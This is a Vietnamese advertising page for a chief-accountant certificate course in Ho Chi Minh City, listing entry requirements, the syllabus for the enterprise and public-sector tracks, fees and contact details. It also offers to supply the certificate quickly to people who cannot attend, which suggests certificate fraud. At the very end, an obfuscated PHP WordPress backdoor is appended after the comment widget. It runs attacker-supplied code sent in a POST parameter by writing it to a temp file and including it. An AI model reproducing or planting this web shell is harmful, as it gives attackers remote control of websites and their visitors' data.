1

Khóa học chứng chỉ kế toán trưởng ở tp HCM

HỌC KÈM RIÊNG KẾ TOÁN 1-1 xem ngay

LỚP HỌC KẾ TOÁN NỘI BỘ CẤP TỐC xem ngay

LỚP KẾ TOÁN CHO NGƯỜI MỚI BẮT ĐẦU xem ngay

Khai giảng lớp học bồi dưỡng chứng chỉ kế toán trưởng tại Hồ Chí Minh Uy Tín Tốt nhất

Kế toán trưởng là người được bổ nhiệm đứng đầu bộ phận kế toán nói chung của các cơ quan, đơn vị, doanh nghiệp, xí nghiệp, cơ sở… và là người phụ trách, chỉ đạo chung và tham mưu chính cho lãnh đạo về tài chính và các chiến lược tài chính, kế toán cho doanh nghiệp.

ĐIỀU KIỆN VÀ ĐỐI TƯỢNG ĐƯỢC THAM GIA HỌC CHỨNG CHỈ KẾ TOÁN TRƯỞNG:

Có trình độ chuyên môn, nghiệp vụ về tài chính, kế toán, kiểm toán từ bậc trung cấp trở lên và có thời gian công tác thực tế về tài chính, kế toán, kiểm toán như sau:

 1. Tối thiểu 2 năm kể từ ngày ghi trên bằng tốt nghiệp đại học chuyên ngành tài chính, kế toán, kiểm toán.
 2. Tối thiểu 3 năm kể từ ngày ghi trên bằng tốt nghiệp trung cấp hoặc cao đẳng chuyên ngành tài chính, kế toán, kiểm toán.
 3. Học viên phải trải qua hai lần làm bài kiểm tra giữa và cuối khóa. Nếu đạt yêu cầu (5/10 điểm trở lên) sẽ được cấp chứng chỉ. Học viên được thi lại một lần bài thi hết học phần không đạt yêu cầu vào cuối khóa học.
 4. Khi đạt yêu cầu trong bài thi cấp chứng chỉ kế toán trưởng, học viên sẽ được cấp chứng chỉ theo mã số 012 (mẫu chứng chỉ do bộ tài chính ban hành)

MỤC ĐÍCH KHÓA HỌC

– Trang bị, cập nhật đồng thời hệ thống hoá những kiến thức cơ bản, chuyên sâu về quản lý kinh tế, tài chính, kế toán, kiểm toán cho những đối tượng thuộc diện bồi dưỡng kế toán trưởng nhằm nâng cao năng lực quản lý kinh tế, tài chính, tổ chức công tác kế toán, tổ chức bộ máy kế toán và chỉ đạo thực hiện công việc kế toán trong đơn vị.

– Tiêu chuẩn hoá chuyên môn, nghiệp vụ tài chính, kế toán, kiểm toán và trình độ tổ chức công tác kế toán, tổ chức bộ máy kế toán đối với đội ngũ kế toán trưởng trong nền kinh tế quốc dân. 

Việc học chứng chỉ kế toán trưởng ngày càng trở lên quan trọng và cần thiết đối với nhân sự ngành Kế toán. Tuy nhiên việc lựa chọn đơn vị tổ chức uy tín theo học là điều mà các học viên cần quan tâm.

KẾ TOÁN HÀ NỘI GROUP là 1 trong số rất ít các trung tâm được cấp phép, nhận được sự tin tưởng của Hội Kế toán và Kiểm toán Việt Nam, lựa chọn hợp tác đồng tổ chức “Khóa học Chứng chỉ Kế toán trưởng doanh nghiệp và Khóa học Chứng chỉ Kế toán trưởng Hành chính sự nghiệp“.

Chương trình học chứng chỉ kế toán trưởng tại TpHCM

Lớp chứng chỉ kế toán trưởng doanh nghiệp

(Đủ điều kiện bổ nhiệm chức danh KTT doanh nghiệp theo Thông tư 199/2011/TT-BTC ngày 30/12/2011 của Bộ trưởng Bộ Tài chính)

Phần kiến thức chung

+ Chuyên đề 1: Pháp luật liên quan đến doanh nghiệp;

+ Chuyên đề 2: Quản lý tài chính doanh nghiệp;

+ Chuyên đề 3: Pháp luật về thuế;

+ Chuyên đề 4: Thẩm định dự án đầu tư;

+ Chuyên đề 5: Quan hệ tín dụng, thanh toán và bảo lãnh giữa doanh nghiệp với Ngân hàng và Tổ chức tài chính.

Phần kiến thức nghiệp vụ

+ Chuyên đề 6: Pháp luật về kế toán;

+ Chuyên đề 7: Tổ chức công tác kế toán và vai trò, nhiệm vụ kế toán trưởng doanh nghiệp;

+ Chuyên đề 8: Kế toán tài chính doanh nghiệp (kể cả kế toán đặc thù);

+ Chuyên đề 9: Tổ chức kế toán quản trị doanh nghiệp;

+ Chuyên đề 10: Báo cáo tài chính và phân tích tài chính doanh nghiệp;

+ Chuyên đề 11: Kiểm toán và kiểm toán báo cáo tài chính doanh nghiệp.


Lớp kế toán trưởng hành chính sự nghiệp tại Tphcm

Chương trình học lớp kế toán trưởng hành chính sự nghiệp được biên soạn và đào tạo bao gồm 2 phần, 10 chuyên đề kiến thức chung và kiến thức nghiệp vụ:

Phần kiến thức chung

Chuyên đề 1: Pháp luật về kinh tế áp dụng cho các đơn vị thuộc lĩnh vực kế toán nhà nước;

Chuyên đề 2: Tổ chức quản lý dự toán, cấp phát,quyết toán thu – chi ngân sách NN, Đơn vị có sử dụng kinh phí NSNN và đơn vị không sử dụng kinh phí NSNN;

Chuyên đề 3: Mở và quản lý tài khoản,kiểm soát chi NSNN qua kho bạc Nhà nước;

Chuyên đề 4: Tài chính các đơn vị có sử dụng kinh phí NSNN và đơn vị không sử dụng kinh phí NSNN.

Phần kiến thức nghiệp vụ

Chuyên đề 5: Pháp luật về kế toán, tổ chức công tác kế toán trưởng

Chuyên đề 6: Kế toán NSNN và hoạt động

Chuyên đề 7: Kế toán đơn vị có sử dụng NSNN và không sử dụng NSNN.

Chuyên đề 8: Báo cáo tài chính,báo cáo quyết toán đơn vị Hành chính sự nghiệp

Chuyên đề 9: Phân tích BCTC đơn vị thu – chi NSNN và đơn vị không thu chi NSNN

Chuyên đề 10: Kiểm toán BCTC, báo cáo quyết toán đơn vị HCSN.

Khóa học Chứng chỉ Kế toán trưởng được thiết kế nhằm mục đích cung cấp cho học viên những kiến thức, kỹ năng, công cụ quản lý mà một Kế toán trưởng phải có để vận hành và quản lý có hiệu quả nghiệp vụ tại doanh nghiệp. 

Chương trình đào tạo Chứng chỉ Kế toán trưởng của KẾ TOÁN HÀ NỘI GROUP được xây dựng và giảng dạy bởi đội ngũ Tiến sĩ, Thạc sĩ và những chuyên gia với bề dày kinh nghiệm trên 20 năm hiện tại đang công tác tại các doanh nghiệp, tập đoàn lớn hoặc Hội kế toán và kiểm toán Việt Nam. Do vậy, nền tảng kiến thức tại KẾ TOÁN HÀ NỘI GROUP truyền đạt đến học viên đảm bảo cung cấp cho học viên những nội dung hiệu quả và thực tế, có những tham mưu mang tính chiến lược và trở thành những Kế toán trưởng chuyên nghiệp trong tương lai.

Kết thúc khóa học, học viên sẽ được cấp Chứng chỉ Kế toán trưởng phôi bằng của Bộ Tài chính, theo mã số 012 (mẫu chứng chỉ do bộ tài chính ban hành). Đặc biệt, những trường hợp học viên chưa đủ các tiêu chuẩn dự học đã nêu trên nhưng vẫn có nhu cầu được bổ sung kiến thức Hội kế toán và kiểm toán Việt Nam vẫn chấp nhận cho dự học và cuối khóa chỉ được cấp giấy chứng nhận đã hoàn thành chương trình bồi dưỡng kế toán trưởng.

Trải qua nhiều khóa học được đào tạo tại trung tâm KẾ TOÁN HÀ NỘI GROUP, chúng tôi tự hào khi 100% học viên đều hài lòng về chất lượng giảng dạy của trung tâm. Nhiều kế toán trưởng sau khóa học đã có thể tìm được những cơ hội thăng tiến trong sự nghiệp và tự tin thực hiện tốt công việc của kế toán trưởng chuyên nghiệp.

Kế Toán Hà Nội có chương trình đào tạo theo đúng quy định của bộ tài chính

Một trong những điều mà học viên quan tâm nhất khi tìm hiểu trung tâm đào tạo kế toán trưởng tại Hà Nội uy tín đó chính là nội dung đào tạo. Tại trung tâm Kế Toán Hà Nội; chương trình đào tạo kế toán trưởng được biên soạn theo quy định của bộ tài chính. Củng cố các kiến thức cơ bản và giúp học viên tiếp cận các kiến thức chuyên sâu về kế toán.

Học viên sẽ nhận được nhiều lợi ích sau khóa học kế toán trưởng

 Đến với trung tâm đào tạo kế toán trưởng tại Hà Nội; mỗi học viên sẽ được nâng cao trình độ làm việc; được trang bị một hệ thống kiến thức rộng lớn. Để từ đó nắm bắt chính xác kỹ năng quản lý bộ máy kế toán; tổ chức bộ máy kế toán và chỉ đạo các công việc của bộ phận kế toán.

 Bằng phương pháp giảng dạy khoa học của trung tâm đào tạo kế toán trưởng Kế Toán Hà Nội; học viên sẽ biết cách cập nhật những thông tư mới ban hành về luật; biết cách lập kế hoạch kinh doanh; kế hoạch vốn lưu động cho doanh nghiệp.

Trung tâm đào tạo kế toán trưởng tại Hà Nội  Học viên hiểu rõ được những thay đổi trong luật kế toán và nghề kế toán; hiểu rõ được vai trò của một kế toán trưởng trong doanh nghiệp. Nắm bắt tính chất, nội dung, mục đích hoạt động của các loại kiểm toán hiện nay.

Trung tâm đào tạo kế toán trưởng tại Hà Nội  Trung tâm đào tạo kế toán trưởng sẽ hỗ trợ học viên nắm vững phương pháp phân tích cơ cấu tài chính; rủi ro tài chính; rủi ro kinh doanh và đưa ra được các dự báo cho doanh nghiệp một cách chính xác và đúng luật.

Trung tâm đào tạo kế toán trưởng tại Hà Nội – Kế Toán Hà Nội thông báo mức học phí đang có chương trình ưu đãi. Giảm giá 530.000VNĐ/học viên nay giá khóa học chỉ còn 2.970.000/khóa/học viên. Ngoài ra học viên sẽ được cấp tài liệu ôn tập miễn phí; được hỗ trợ giải đáp thắc mắc lâu dài.

CAM KẾT VÀ BAO ĐỖ KHÓA HỌC

Bạn nào không có thời gian theo học và cần chứng chỉ gấp mình hỗ trợ được.

Liên hệ ngay hoặc Inbox Zalo 0973.761.751 để được tư vấn, gửi chi tiết nội dung, hồ sơ, thủ tục phiếu đăng ký học cũng như gửi lịch học mới nhất luôn nhé!

LỚP KẾ TOÁN NỘI BỘ ONLINE xem ngay

LỚP TIN HỌC VĂN PHÒNG CẤP TỐC xem ngay

LỚP HỌC CHỨNG CHỈ KẾ TOÁN TRƯỞNG xem ngay

LỚP KẾ TOÁN CHO GIÁM ĐỐC CHỦ DOANH NGHIỆP xem ngay


  TƯ VẤN MIỄN PHÍ - HỖ TRỢ 24/7

  Nếu bạn đang quan tâm " KHÓA KẾ TOÁN TỔNG HỢP THỰC TẾ " thì hãy để lại thông tin tại đây. Chúng tôi sẽ liên hệ lại ngay để hỗ trợ bạn.

  Địa chỉ học(*): Hà NộiTP HCMTỉnh Khác

  Subscribe
  Notify of
  guest

  0 Comments
  Inline Feedbacks
  View all comments
  0
  Would love your thoughts, please comment.x
  ()
  x
  if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}